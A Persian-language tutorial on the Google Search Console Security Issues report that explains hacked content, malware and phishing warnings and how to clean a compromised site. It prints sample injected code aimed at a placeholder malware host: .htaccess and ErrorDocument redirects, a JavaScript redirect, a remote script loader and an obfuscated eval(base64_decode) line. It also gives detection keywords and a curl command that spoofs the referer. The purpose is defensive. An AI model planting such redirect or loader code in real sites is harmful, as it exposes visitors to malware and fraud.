جلسه ۱۴ – گزارش Security Issues سرچ کنسول

در ادامه آموزش های سرچ کنسول در سایت میزفا خدمت شما عزیزان هستیم. در این قسمت قرار است که به طور عمیق به آموزش رفع مشکلات امنیتی و بررسی گزارش Security Issues سرچ کنسول گوگل بپردازیم.

مشکلات امنیتی وبسایت به دلایل مختلفی اتفاق می‌افتند. برای نمونه عدم به روزرسانی افزونه‌های سایت یا استفاده نکردن از هاست مناسب بستری را فراهم می‌کند تا هکرها با سوءاستفاده از نقاط آسیب پذیر به وب‌سایت نفوذ کنند و به واسطه مهندسی اجتماعی یا جایگذاری کد و نرم‌افزارهای مخرب به اهداف شوم خود برسند. این قبیل مشکلات می‌توانند نتیجه مدت‌ها تمرکز روی سئو سایت یا جلب اعتماد بازدیدکنندگان را بر باد دهد!

انواعی از این مشکلات امنیتی توسط گوگل شناسایی شده و در قالب خطا یا هشدارهای امنیتی در بخش گزارش Security Issues سرچ کنسول نمایش داده می‌شود. در ادامه به انواع مشکلات امنیتی سایت می‌پردازیم و یکسری راه حل خوب برای رفع مشکل امنیتی در سرچ کنسول ارائه خواهیم داد. همچنین اگر سایت وردپرسی دارید بهتر است با نصب بهترین افزونه امنیت وردپرس نقاط آسیب پذیر سایت را شناسایی کنید.

بررسی انواع مشکلات امنیتی

شاید یک تبلیغ مخرب در جایی از سایت که انتظارش را ندارید درحال فیشینگ کاربران باشد و از این طریق آن‌ها را نسبت به افشای اطلاعات محرمانه فریب می‌دهد! هکرها ممکن است با افزودن صفحات پنهان به همراه لینک و متون پنهانی در حال سوء استفاده باشند. این محتوا توسط موتور جستجو مشاهده می‌شود اما از دید شما و سایر بازدیدکنندگان دور است! ممکن است افرادی به سایت نفوذ کرده باشند و با افزودن کدهای مخرب ریدایرکت ناخواسته ایجاد کنند و بازدیدکنندگان را به صفحات خطرناک هدایت کنند.

اصلا مشکلات امنیتی چه هستند و به چه روش‌هایی انجام می‌شوند؟ قبل از آموزش گزارش Security Issues سرچ کنسول خیلی عالی می‌شود اگر بتوانید مشکلات امنیتی را از هم تفکیک کنید و نوع مشکل امنیتی که دچار آن شده‌اید را بشناسید. گوگل در مقالات خود انواع Security Issues یا مشکلات امنیتی را به سه دسته تقسیم کرده است؛ در ادامه به طور کلی این 3 مورد را به همراه چند مثال ساده توضیح می‌دهیم.

1- Hacked content یا محتوای هک شده

محتوای هک شده یا Hacked content درواقع محتوایی است که بدون اجازه شما در سایت جاسازی شده و بازدیدکنندگان را به سمت اهداف موردنظر هکرها هدایت می‌کند. در این مشکل امنیتی نقاط آسیپ پذیر سایت هدف قرار می‌گیرند و نفوذ انجام می‌شود.

دلیل اهمیت گوگل به این مقوله این است که وجود یک محتوای هک شده موجب می‌شود تا کاربران از نتایج جستجو گوگل راضی نباشند؛ به عنوان مثال کاربری را درنظر بگیرید که از طریق نتایج جستجو گوگل روی لینکی کلیک می‌کند که در مورد “دانلود آهنگ” است، اما صفحه‌ای که باز می‌شود چه از لحاظ نام سایت و چه از لحاظ موضوعی بی‌ربط با آنچه است که انتخاب کرده بود، در نهایت همین موضوع عاملی می‌شود تا از محبوبیت گوگل بین کاربران کاسته شود.

انواع Hacked content

1. Injected content: محتوای تزریق شده یا Injected content یعنی محتوای مخربی که توسط هکر به صفحه ای از سایت یا iframe اضافه می‌شود. این Injected content معمولا در قالب یک قطعه کد جاوا اسکریپت با اهداف مخربانه است.
2. Added content: همانطور که از نام Added content پیداست یعنی محتوای اصافه شده. در این مشکل امنیتی هکرها از نقض های امنیتی استفاده کرده و یکسری صفحات جدید که شامل محتوای مخرب یا اسپم است را به سایت اضافه می‌کنند. هدف چیست؟ تخریب موتورهای جستجو و کاهش کیفیت عمکلرد سایت! این صفحات مخرب ممکن است به بازدیدکنندگان سایت آسیب بزنند یا عملکرد سایت را در موتورهای جستجو کاهش بدهند و در عین حال بی سر و صدا و بدون  آنکه شما متوجه شوید به فعالیت ادامه دهند.
3. Hidden content: خب Security Issues می‌تواند از موارد بالا هم ترسناک‌تر شود و آن هم محتوای مخرب اما پنهان است!? این محتوای پنهان بدون آنکه روح شما و بازدیدکنندگان خبر داشته باشد در سایتتان جا خوش کرده و با یکسری لینک و متون پنهانی سعی در تخریب سایت و یا دریافت بک لینک دارد. نکته اینجاست که چنین محتوای پنهانی توسط موتورهای جستجو خزش می شوند اما از دید شما خارجند! محتوای پنهان توسط هکرها و با استفاده از HTML یا CSS به صفحات افزوده می‌شوند.
4. Redirects: محتوای هک شده حتی می تواند یک کد ناخواسته در سایت باشد که برخی کاربران را به صفحات خطرناک یا اسپم هدایت می‌کند. برای مثال فرض کنید که کاربر پس از کلیک روی صفحه‌ای از سایت شما که در نتایج موتور جستجو ظاهر شده به آدرسی مشکوک ریدایرکت شود! البته این ریدایرکت مخرب می تواند طوری تعیین شود که اگر کاربر همان آدرس را به طور مستقیم در مرورگر وارد کرد ریدایرکت نشود بلکه ریدایرکت تنها از سمت ترافیک ورودی از موتور جستجو انجام گیرد.

2-بدافزار و نرم افزارهای ناخواسته

تابحال در گزارش مشکلات امنیتی سرچ کنسول با اخطار Harmful downloads و Malware مواجه شده‌اید؟ یکی از هشدارهایی که ممکن است در گزارش Security Issues سرچ کنسول مشاهده کنید مشکلات امنیتی مرتبط با بدافزارها (malware) و نرم افزارهای ناخواسته است. چنین مشکلات امنیتی می‌توانند طوری طراحی شوند که تنها با قرارگیری در هاست باعث اختلال عمکلرد سایت شود. این بدافزارها نه تنها برای سایت یک تهدید جدی محسوب می‌شوند بلکه برای بازدیدکنندگان عادی سایت نیز مشکل ساز خواهند شد.

این بدافزار و نرم افزارها به منظور آسیب به سایت یا آسیب به کاربر طراحی شده‌اند. درواقع برخلاف مورد قبلی که یکسری محتوا در قالب کد و متن به سایت افزوده می‌شد، این مشکل امنیتی به نرم افزار و بدافزار اشاره دارد. به تعاریف زیر دقت کنید:

1. malware: تعریف کلی بدافزار یا malware  اپلیکیشن یا نرم افزاری است که به طور اختصاصی برای آسیب به کامپیوتر، موبایل، نرم افزار اجرا کننده آن و حتی کاربران طراحی شده‌است. البته در این مقاله آموزش Security Issues سرچ کنسول منظورمان از malware یک بدافزار تحت وب است که بدون آگاهی کاربر اجرا می‌شود. اخطار Harmful downloads سرچ کنسول نیز همان بدافزار یا نرم افزار مخرب و قابل دانلود می‌باشد که صرفا برای دانلود توسط کاربر طراحی شده است.
2. unwanted software: نرم افزارهای ناخواسته یک فایل قابل اجرا (executable) هستند که به منظور فریب یا تأثیر منفی روی فرآیند کار کردن کاربر در مرورگر طراحی می‌شوند. بخاطر یک نرم افزار ناخواسته که در هاست سایت قرار گرفته ممکن است اطلاعات محرمانه شما جمع‌آوری شوند یا تنظیمات مرورگر بدون خواسته شما تغییر ‌کنند.

3- Social engineering

مشکلات امنیتی سرچ کنسول همیشه از نوع بدافزار یا محتوای هک شده نیست. فریب کاربر از طریق مهندسی اجتماعی از روش های نه چندان پیچیده محسوب می‌شود. احتمالا با فیشینگ آشنا باشید و یا احداقل اسمی از آن را شنیده باشید، درحقیقت فیشینگ نوعی Social engineering یا مهندسی اجتماعی است.

حملات مهندسی اجتماعی یعنی وقتی که کاربر وب برای اقدامی خطرناک در فضای آنلاین گول می‌خورد. شاید با خودتان بگویید که من چنین کاری را در سایت خودم انجام نمی‌دهم، اما اگر شما انجام نمی‌دهید، آیا شخصی که به سایت شما نفوذ کرده نمی‌تواند انجام دهد؟

بد نیست که با انواع مهندسی اجتماعی در سطح وب اتفاق می‌افتد آشنا شوید:

1. فیشینگ: فیشنگ به معنای فریب کاربر برای افشای اطلاعات شخصی است. این حمله‌ی امنیتی معمولا در محیطی که به نظر امن می‌رسد اتفاق می‌افتد، مثل صفحه‌ای تقلبی که شبیه به درگاه بانک است اما درواقع به منظور جمع‌آوری اطلاعات بانکی کاربران طراحی شده‌است.
2. محتوای فریب دهنده: محتوای فریب دهنده یا Deceptive content درواقع شکلی از محتوا است که کاربر را فریب می‌دهد تا دست به اقدامی بزند که فقط آن را در محیط یا برای شخص مورداعتماد انجام میداد. برای مثال محتوایی را فرض کنید که تبلیغی در آن تعبیه شده که اعلام می‌کند نرم افزار شما نیاز به آپدیت دارد و بلافاصله پس از کلیک کاربر بر روی تبلیغ فایلی دانلود می‌شود که در حقیقت یک بدافزار است.
3. خدمات شخص ثالث غیرشفاف: در برخی مواقع ممکن است نیمی از وظایف نگهداری سایت یا ارائه خدمات توسط شخص دیگری که دارای موجودیت مستقلی از سایت شما است انجام گیرد. برای نمونه فرض کنید یک سایت خیریه راه‌اندازی کرده‌اید و بنابه دلایلی بخش جمع آوری خیرات مردم را به سایت دیگری (شخص ثالث) واگذار می‌کنید. در چنین حالتی اگر ارتباط بین سایت خودتان و سایت شخص ثالث بدون شفاف سازی صورت گیرد باید منتظر باشید که گوگل برچسب “مهندسی اجتماعی” را به سایت شما بزند. به چنین مشکل امنیتی Insufficiently labeled third-party services یا خدمات شخص ثالث غیرشفاف می‌گویند.

 بررسی گزارش Security Issues سرچ کنسول

چنانچه سایت شما درگیر یکسری مشکلات امنیتی شده باشد احتمالا با لیستی از اعلانات امنیتی روبرو خواهید شد. این اعلانات در بخش Security & Manual Actions و قسمت Security Issues قابل بررسی هستند. گزارش Security Issues در گوگل سرچ کنسول شامل یکسری اعلانات امنیتی است که نوع مشکل امنیتی، توضیحات و مثالی از آدرس‌های تحت تأثیر قرار گرفته را اعلام می‌کند.

شناسایی مشکلات امنیتی با Google Safe Browsing

جالب است بدانید که هر روز هفته سرویس Google Safe Browsing هزاران سایت ناامن را کشف می‌کند. اما شاید بپرسید این سرویس چیست؟

سرویس Google Safe Browsing به طور اختصاصی توسط تیم امنیتی گوگل به منظور شناسایی وب‌سایت های ناامن طراحی شده است. Google Safe Browsing پس از شناسایی یک سایت غیرامن بلافاصله وب مستر و بازدیدکننده را از وجود مشکل امنیتی باخبر می کند.

به عبارتی همین اعلانات امنیتی گزارش Security Issues سرچ کنسول توسط سرویس Google Safe Browsing شناسایی شده و این گزارشات به همراه جزئیات دقیق به سرچ کنسول ارائه می‌شود. البته شرکت گوگل در مورد نحوه عمکلرد Google Safe Browsing توضیحات دقیقی ارائه نداده‌است اما این سرویس با اسکن و استفاده از ماشین های مجازی سایت‌‌های در معرض خطر را شناسایی و آنالیز می‌کند.

عواقب جدی نگرفتن Security Issues سرچ کنسول

• درمواقعی هنگام ورود به سایت یک هشدار امنیتی به بازدیدکنندگان نمایش داده شود و وجه سایت تحت تأثیر قرار می‌گیرد.
• اطلاعات محرمانه‌ای که استفاده می‌کنید فاش شود و مورد سوء استفاده قرار بگیرد.
• ممکن است به زودی سایت شما از دسترس خارج شود.
• عملکرد سایت افت پیدا کند (بررسی گزارش core web vitals سرچ کنسول مرتبط با کیفیت عملکرد سایت است)
• به دلیل مشکلات امنیتی رتبه سایت به طور چشمگیری کاهش یابد.
• کاربران سایت در دام خطرات امنیتی بیفتند (مثل دانلود بدافزار، ریدایرکت به آدرسی خطرناک و …)
• کاربران سایت اعتمادی که به شما داشته‌اند را از دست بدهند.

کدام صفحات دچار مشکلات امنیتی شده‌اند؟

راستش را بخواهید گزارش Security Issues مثل گزارش Mobile Usability سرچ کنسول نیست که تمام URL‌های تحت تأثیر را به شما گزارش دهد. در حقیقت Sample URLs که در توضیحات در اعلان امنیتی می‌بینید تنها یک مثال از چندین صفحه تحت تأثیر قرار گرفته است.

به گفته گوگل بنابه دلایلی امکان مشخص کردن تمام آدرس‌هایی که دچار یک مشکل امنیتی شده‌اند وجود ندارد! به هرحال اگر دیدید که در جزئیات فلان اعلان امنیتی خبری از Sample URLs نیست دلیل براین نیست که به امان خدا رهایش کنید!

آموزش رفع مشکلات امنیتی سرچ کنسول

در این بخش لیستی از خطاهای رایج و هشدارهای امنیتی سرچ کنسول و نحوه رفع آن را مشاهده خواهید کرد. مدنظر داشته باشید که به معنی خطا و به معنی هشدار است.

نکته خیلی مهم: هرگز URL صفحات آلوده را در مرورگر خود باز نکنید. زیرا خودتان هم ممکن است قربانی شوید. حتی هکر ممکن است با وصول به تکنیک‌های cloaking* محتوای اسپم را از دید بازدیدکننده پنهان کند. بنابراین ترجیحاً از ابزار url inspection سرچ کنسول برای بازدید از صفحه و بررسی کد و منابع آن استفاده کنید. راه حل دیگر استفاده از cURL و Wget  برای بررسی URL های موردنظر از منابع مختلف است. برای مثال قطعه کد زیر در از منبع گوگل صفحه http://www.example.com/page.html درخواست می‌دهد.

$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

*Cloaking: کلوکینگ یعنی نمایش محتوای متفاوت به کاربران و روبات موتور جستجو. برای نمونه تعبیه لینک‌هایی در سایت که از دید بازدیدکننده پنهان است اما توسط موتورهای جستجو خزش می‌شوند.

1- مشکل امنیتی Deceptive pages

اگر در برخی از صفحات سایت محتوایی فریب دهنده وجود داشته باشد در پنل سرچ کنسول خطای Deceptive pages مشاهده خواهید کرد. در Deceptive pages از تکنیک‌های مهندسی اجتماعی برای گول زدن کاربر استفاده می‌شود تا هکر به اهداف خود برسد. در چنین شرایطی سرویس Google Safe Browsing هشداری را به بازدیدکنندگان همان صفحات نمایش می‌دهد، اکنون تصور کنید این مقوله چقدر روی اعتماد کاربر و تجربه کاربری اثر منفی دارد.

جهت رفع خطای Deceptive Pages سرچ کنسول

مرحله اول: به آدرسی که برای نمونه درج شده‌است (sample URLs) این خطا مراجعه کنید و اقدام به شناسایی و رفع محتوای فریب دهنده کنید. به شما پیشنهاد می‌کنم بخش مهندسی اجتماعی این مقاله را مجدد مطالعه بفرمایید.
مرحله دوم: پس از رفع خطا برای درخواست تجدید نظر توسط گوگل روی Request Review کلیک کنید.

نکته: اگر به یقین رسیدید که سرویس گوگل اشتباه کرده‌است و فیشینگ در صفحه موردنظر اتفاق نیافتاده‌است این مورد را از اینجا به گوگل report کنید.

2- مشکل امنیتی Deceptive embedded resources

خطای Deceptive embedded resources سرچ کنسول یعنی در جایی از سایت منابعی به منظور فریب کاربر تعبیه شده‌اند. این منابع می‌تواند اعم از تصویر، تبلیغات یا سایر بخش‌های مرتبط با شخص ثالث باشد. فریب بازدیدکننده برای افشای اطلاعات محرمانه یا دانلود یک نرم افزاری ناخواسته مثالی از اهداف تعبیه چنین منابعی در سایت است.

نحوه رفع خطا Deceptive embedded resources سرچ کنسول

مرحله اول: جهت رفع خطای امنیتی Deceptive embedded resources سرچ کنسول به آدرسی که به عنوان نمونه ذکر شده‌است مراجعه کنید (Sample URLs) و از بابت نبود محتوایی فریب دهنده مطمئن شوید. برای مثال به بخشی از سایتتان که به تبلیغات سایر شبکه های تبلیغاتی اختصاص داده‌اید توجه کنید؛ شاید هدف محتوای تبلیغاتی این شبکه در نسخه موبایل فریب بازدیدکننده است اما شما از همه جا بی‌خبر گمان می‌کردید که تبلیغ نمایش داده شده در دسکتاپ همانی است که در نسخه موبایل نشان داده می‌شود. پیشنهاد می‌کنم برای بررسی صفحات سایت در دو نسخه موبایل یا دسکتاپ از ابزار url inspection سرچ کنسول استفاده کنید.

مرحله دوم:‌ درنهایت پس از شناسایی عامل فریب دهنده آن را حذف کنید. پس از رفع خطا باید برای بررسی‌های دوباره گوگل درخواست جدید نظر را اط رطیق دکمه Request Review ثبت کنید.

3- مشکل امنیتی Harmful downloads

اگر بازدیدکنندگان سایت به هرطریقی مجبور یا دعوت به دانلود یک بدافزار و یا حتی نرم افزاری ناخواسته شوند در چنین شرایطی خطای Harmful downloads را در گزارشات امنیتی سرچ کنسول دریافت خواهید کرد. گوگل کروم برای محافظت از امنیت کاربران یک هشدار امنیتی به تک تک بازدیدکنندگان سایت نمایش خواهد داد.

جهت رفع مشکل امنیتی Harmful downloads سرچ کنسول

مرحله اول: اگر خودتان به عمد این فایل‌ها را در سایت قرار داده‌اید پس حتماً آن را حذف کنید اما نسبت به درخواست تجدیدنظر یا همان Request Review اقدام نکنید.

مرحله دوم: اگر خودتان از چنین مشکلی اطلاع نداشته‌اید پس سایت شما دچار هک شده‌است. اول سایت هک شده خود را از چنگ هکر دربیاورید و پس از قطع دسترسی او نسبت به حذف فایل‌های دانلودی مضر (Harmful downloads) اقدام کنید. گوگل در این مقاله نحوه پاکسازی یک سایت هک شده را آموزش داده‌است.
مرحله سوم: در مرحله بعدی پس از پاکسازی سایت می‌توانید فایل بکاپی که از نسخه سالم سایت داشته‌اید را جایگزین فایل‌های آلوده کنید، اگر سایت وردپرسی دارید و هنوز گرفتار هک نشده‌اید پس همین الآن با استفاده از یکی از بهترین افزونه‌های بکاپ وردپرس بکاپ‌های اتوماتیک و زمانبندی شده تنظیم کنید.
مرحله چهارم: همچنین اگر فکر می‌کنید که بخشی از سایت به نوعی بدافزار آلوده شده‌است از ابزار VirusTota کمک بگیرید.
مرحله پنجم: درنهایت پس از اطمینان از رفع مشکل درخواست تجدیدنظر را از طریق دکمه Request Review  ثبت نمایید.

4- مشکل امنیتی Links to harmful downloads

این خطای امنیتی کمی شبیه به خطای امنیتی پیشنین یعنی Harmful downloads است با این تفاوت که لینکی به فایل دانلودی مضر در صفحات سایت شما قرار گرفته است، به عبارتی اگر کاربر روی لینکی کلیک کند به بدافزار یا نرم افزار موردنظر هکر هدایت می‌شود.

جهت رفع خطا Links to harmful downloads سرچ کنسول

مرحله اول: اگر خودتان از عمد چنین لینک هایی ایجاد کرده اید پس آن لینک را حذف کنید اما نسبت به درخواست تجدیدنظر یا همان Request Review اقدام ننمایید. اگر از چنین لینک‌هایی بی‌اطلاع بوده‌اید پس احتمالا هک شده اید و از یک طریقی در سایت شما نفوذ انجام شده‌است (مثل باگ امنیتی، قالب و افزونه غیراورجینال). در چنین شرایطی راه نفوذ هکر را ببندید.

مرحله دوم: پس از رفع مشکل هک سایت سراغ آدرس‌های نمونه یا sample URLs که در کادر این خطای امنیتی ارائه شده‌است بروید. چنانچه خبری از لینک ناسالم نبود این احتمال وجود دارد که هکر برخی از این لینک‌ها را از دید شما پنهان کرده باشد. پس برای بررسی بیشتر از ابزار url inspection سرچ کنسول برای مشاهده Crawled page کمک بگیرید. اگر بازهم به نتیجه نرسیدید با یک دسترسی دیگر یا حتی سیستم متفاوت بررسی کنید.

مرحله سوم: پس از شناسایی و حذف لینک‌های مضر نوبت می‌رسد به پاکسازی سایت، این کار باید انجام شود تا مجدد هک نشوید؛ گوگل در این مقاله نحوه پاکسازی یک سایت هک شده را آموزش داده‌است.  در این مرحله می‌توانید فایل بکاپی که قبلا از نسخه سالم سایت تهیه کرده‌بودید را جایگزین صفحات آلوده فعلی کنید. (معرفی بهترین افزونه‌های بکاپ گیری برای سایت وردپرسی)
مرحله چهارم: پس از رفع این مشکل امنیتی کافیست در گزارش Security Issues سرچ کنسول گزینه Request Review را انتخاب نمایید.

5- مشکل امنیتی Unclear mobile billing

همانطور که می‌دانید امنیت کاربران برای گوگل اهمیت بالایی دارد و این امنیت شامل پرداخت‌های مالی و شفاف سازی نیز می‌شود. اگر در صورتحساب مشترکین اطلاعات دقیق و مرتبط با عوارض موبایل ارائه نشده باشد و به عبارتی کاربر نداند بابت چه خدمات و چه محصولاتی در حال پرداخت صورتحساب است در این صورت خطای امنیتی Unclear mobile billing شامل حال سایت خواهد شد.

همچنین اگر درقبال انجام خدماتی کارمزد دریافت می‌کنید حتما در این مورد توضیحاتی ارائه دهید تا کاربر بداند بابت چه خدمات و محصولاتی در حال پرداخت است.

در نتیجه برای رفع خطای Unclear mobile billing سرچ کنسول تنها کافیست ساختار مالیاتی دقیقی به کاربران ارائه دهید و مبهم عمل نکنید. درنهایت پس از رفع مشکل درخواست تجدید نظر را از طریق گزینه Request Review سرچ کنسول ثبت نمایید.

6- مشکل امنیتی Malware

همانطور که در بخش معرفی انواع مشکلات امنیتی سرچ کنسول همین صفحه توضیح داده شد malware یا بدافزار نوعی نرم افزار مخرب است که با هدف آسیب به کاربر، سیستم، موبایل یا هرنرم‌افزار دیگری که میزبان آن است طراحی شده‌است. این بدافزار می‌تواند حامل ویروس، تروجان، نرم افزارهای تبلیغاتی مزاحم و هرچیز مخرب دیگری باشد!

برای رفع مشکل امنیتی Malware سایت این نکته را عرض کنم که رفع چنین مشکلاتی نیاز به دانش نسبی از کد و کانفیگ وب سرور سایت دارد. در ادامه به رایج‌ترین خطاهای امنیتی مرتبط با بدافزارهای وب‌سایت می‌پردازیم:

Server configuration malware (unwanted redirects)

درمواقعی هکر با یکسری تغییرات در فایل کانفیگ سرور و افزودن یکسری ریدایرکت‌های ناخواسته موجب می‌شود تا کاربران سایت در دام خطر بیفتند. چرا فایل کانفیگ سرور چیست؟ درواقع این فایل‌ها به مدیران سایت اجازه می‌دهد تا برای آدرس و دایرکتوری‌های سایت ریدایرکت مشخص کنند، برای مثال در سرور آپاچی فایل‌های کانفیگ سرور همان htaccess و httpd.con می‌باشد. جهت رفع این مشکل امنیتی مراحل زیر را دنبال کنید:

مرحله اول: آدرس‌هایی که به عنوان نمونه در گزارش این مشکل امنیتی ارائه شده است را به روش امن مورد بررسی قرار دهید. (مانند ابزار url inspection سرچ کنسول  یا استفاده از cURL و Wget  )

مرحله سوم: هدر صفحه‌ای که از روش کانفیگ سرور مورد حمله قرار گرفته‌است احتمالا دارای چنین هدری است (این هدر را می‌توانید در پاسخ HTTP صفحه بررسی کنید):

...
< HTTP/1.1 301 Moved Permanently
< Date: Mon, 24 May 2020 19:07:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

مرحله چهارم: با دسترسی شِل یا ترمینال به سرور لاگین شوید و فایل‌های کانفیگ  سرور را تا جای ممکن بررسی کنید. کاری که باید انجام دهید شناسایی دستور و ریدایرکت ناخواسه و مشکوک است. به عنوان مثال در فایل .htaccess احتمالا با چنین کد ریدایرکتی مواجه خواهید شد:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

در کد بالا بازدیدکندگانی که از گوگل به صفحه سایت مراجعه کرده‌اند با ریدایرکت 301 به آدرسی که هکر تعیین کرده‌است (malware-site) هدایت می‌شوند.

به علاوه این امکان وجود دارد که هکر یکسری کرون جابزهای ناخواسته در پنل هاست ایجاد کرده‌باشد. این کرون جابزها می‌توانند در لوکیشن‌های مختلفی از جمله /etc/crontab یا /var/spool/cron جا خوش کرده باشند.

SQL injection

مشکل امنیتی SQL injection نوعی خطر امنیتی است که با دستکاری دیتابیس سایت به وجود می‌آید. برای مثال ممکن است هکر به هر رکورد دیتابیس کدهایی مخرب اضافه کند و اینگونه با هربار بارگیری صفحاتی که به اطلاعات دیتابیس نیاز دارند، کدهای مخرب نیز اجرا و به بازدیدکننده آسیب برسانند. حواستان به ورودی یا inputهای سایت باشد، چرا که همین ورودی‌ها جاده‌ای است مستقیم به دیتابیس سایت، در نتیجه برای پیشگیری از چنین مشکلاتی حتما کاراکترهای مجاز ورودی‌های سایت را با رگولار اکسپرشن (Regex) محدود کنید.

جهت حل مشکل امنیتی SQL injection سرچ کنسول مراحل زیر را دنبال کنید:

مرحله اول: در خط فرمان (Command Line) یکسری کوئری روی آدرس‌هایی که تحت تأثیر بدافزار قرارگرفته‌اند اجرا کنید و سپس پاسخ را از بابت کلماتی مثل “iframe” و “eval”بررسی نمایید. چنین کلماتی معمولا به حمله به SQL دلالت دارند.

مرحله دوم: سپس به سرور پایگاه داده لایگن شوید (مثل phpMyAdmin). اگر از Wget و cURL می‌توانید با یکسری ورودی‌های پایگاه داده به بخش‌های آلوده دسترسی پیدا کنید. برای مثال اگر به این مشکل پی بردید که در تمامی صفحات سایت به یک نوع iframe مخرب وجود دارد، میتوانید با SQL کوئری زیر کد iframe را جستجو کنید.

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';

مرحله سوم: فایل لاگ و ارورهای دیتابیس را بررسی کنید و از بابت عدم وجود دستورات و لاگ های غیرنرمال مطمئن شوید.

مرحله چهارم: وقتی که آماده پاکسازی سایت شدید می‌توانید تک تک رکوردهای دیتابیس آلوده را آپدیت کنید یا آخرین بکاپ سالمی که از دیتابیس تهیه کرده‌بودید را restore نمایید. (آموزش پاکسازی سایت از اینجا)

Malicious error templates

حتی صفحات 404 سایت و صفحاتی که در سایت وجود ندارند هم می‌تواند طعمه هکرها شود! در مورد خطای 404 بخوانید. در برخی مواقع هکرها تمپلیتی که برای نمایش پیغام‌های خطا سایت استفاده می‌شود را پیکربندی کرده و از این طریق اقدام به توزیع بدافزار می‌کنند. جهت رفع این مشکل امنیتی Malicious error templates مراحل زیر را دنبال کنید:

مرحله اول: با ارسال درخواست http صفحاتی که درسایت وجود ندارند یا دارای خطا هستند را بررسی کنید. پس از ارسال درخواست http می‌توانید وضعیت صفحه را در پاسخ (response) درخواست مشاهده کنید؛ ببینید این response یا پاسخ صفحه آیا از سایت دیگری آمده یا حاوی بدافزار است. (این ابزار به شما کمک می‌کند)

مرحله دوم: وارد وب سرور شوید و در فایل‌های کانفیگ سرور به دنبال انواع دستورات مرتبط با خطای صفحه باشید. برای مثال در سرور آپاچی تمنپلیت خطا در فایل .htaccsess مشخص می‌شود. برای مثال قطعه کد زیر یک ورودی در فایل .htaccsess است که که صفحات با خطای 404 را از سایت مخرب بازیابی می‌کند.

ErrorDocument 404 http://<malware-site>/index.html

مرحله سوم: در نهایت باید سایت را پاکسازی کنید. در این مرحله می‌توانید فایل بکاپ سالم را با فایل‌های .htaccess آلوده جایگزین کنید. در غیراینصورت حتما دستورات ناخواسته‌ای که در فایل‌های .htaccess وجود دارند را حذف کنید.

مرحله چهارم:در نهایت وب سرور را رستارت کنید تا مطمئن شوید که تمام تغییرا اعمال شده‌است.

بارگیری منابع از سایت مخرب یا در معرض خطر

این مشکل امنیتی که با Loading resources from a compromised or malicious site نیز شناخته می‌شود بدین معنی است که سایت شما درحال دریافت محتوا (مثل لینک، کتابخانه و ..) از سایتی است که به داشتن محتوای مخرب شناخته شده است.

در صفحاتی که دارای این مشکل امنیتی می‌باشند در مرورگر کروم معمولا  با چنین تصویری روبرو خواهید شد:

جهت رفع این مشکل امنیتی مراحل زیر را دنبال کنید:

مرحله اول: به تعدادی از sample URL یا آدرس‌های نمونه‌ای که در کادر این خطای امنیتی در سرچ کنسول ارائه شده‌است سر بزنید. چنانچه صفحه ای مشکل داشته باشد با تصویر بالا روبرو خواهید شد.

مرحله دوم: اگر در پیغام هشداری که از سمت مرورگر صادر می‌شود دقت کنید می‌توانید دامین مجهول را مشاهده نمایید. حتما این URL را از کدهای سایت به طور کلی حذف کنید.

مرحله سوم: چنانچه فکر می‌کنید که این موضوع بدون اطلاع شما اتفاق افتاده (برای نمونه لینک سازی‌ها به سایت مشکوک توسط شما انجام نشده) بنابراین موضوع جدی است و قطعا یک نفوذ صورت گرفته‌است. بهتر است در رابطه با ارائه راهکارهای پس از هک سایت این مقاله از سایت گوگل مطالعه کنید.

مرحله چهارم: پس از رفع ایرادات حتما در گزارش Security Issues سرچ کنسول از گوگل بخواهید که مجدد سایت شما را جهت اطمینان از نبود مشکلات امنیتی بررسی و تایید کند. بدین منظور گزینه Request Reveiw را انتخاب کنید.

7- مشکل امنیتی Hacked: Code injection

در بخش Hacked content همین صفحه تا حدودی به تزریق کد و محتوای مخرب به سایت آشنا شدید. برای نمونه هکر ممکن است با نوشتن کد (بدون استفاده از افزونه ریدایرکت) یکسری ریدایرکت های ناسالم و ناخواسته از سایت شما به مقصد دلخواه خودش ایجاد کند. این کدهای تعبیه شده در سایت یا ممکن است در خلال کدهای HTML سایت یا در فایل‌هایی مثل فایل‌های PHP نوشته شده باشد. دوستان در بخش آموزش PHP آکادمی میزفا به زبان ساده زبان سمت سرور PHP را آموزش داده‌ایم.

آموزش رفع خطا Hacked: Code injection سرچ کنسول

مرحله اول: صفحاتی که تحت تأثیر این مشکل امنیتی بوده‌اند را از روش‌های امن شناسایی کنید. معمولا در هربخش از مشکلات امنیتی گزارش Security Issues سرچ کنسول یکسری URL نمونه (Sample URL ) درج شده‌است.

مرحله دوم: هکرها از تکنیک‌های مختلف برای قرار دادن کدهای خطرناک یا ریدایرکت بازدیدکنندگان سایت به مقاصد دلخواه خودشان استفاده می‌کنند، در زیر مهم‌ترین تکنیک‌ها را توضیح دادیم:

ریدایرکت هدر: در این روش فایل کانفیگ سرور توسط هکر تغییر پیدا می‌کند. مثال زیر در برای سرور آپاچی و در فایل .htaccess و همچنین httpd.conf درج شده‌است.

...
< HTTP/1.1 301 Moved Permanently
< Date: Mon, 24 May 2020 19:07:45 GMT
< Server: Apache
< Location: http://<malware-site>/index.html
< Content-Length: 253

ریدایرکت جاوااسکریپت: برای مثال اسکریپت زیر صفحه فعلی سایت را به مقصد موردنظر هکر هدایت می‌کند.

<script>
  if (document.referrer.match(/google\.com/)) {
    window.location("http://<malware-site>/");}
<script>

بازگذاری جاوااسکریپت مخرب از سایت دیگر: 

<script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>

بهم ریختن یک کد مخرب برای جلوگیری از شناسایی شدن:

eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

این مثالی از یک کد بهم ریخته بود. شما می توانید برای یافتن سایر کدهای مشکوک عبارات  “search”، “eval”، “base64_decode” و  “unescape” را در سایت یا هنگام پاسخ (response) از وب سرور جستجو کنید.

مرحله سوم: در مرحله بعدی که آماده پاکسازی سایت شدید می‌توانید فایلهای آسیب دیده را با آخرین نسخه بکاپ جایگزین کنید یا محتوای اسپم را خودتان حذف کنید. (راهنمای پاکسازی سایت از این لینک)

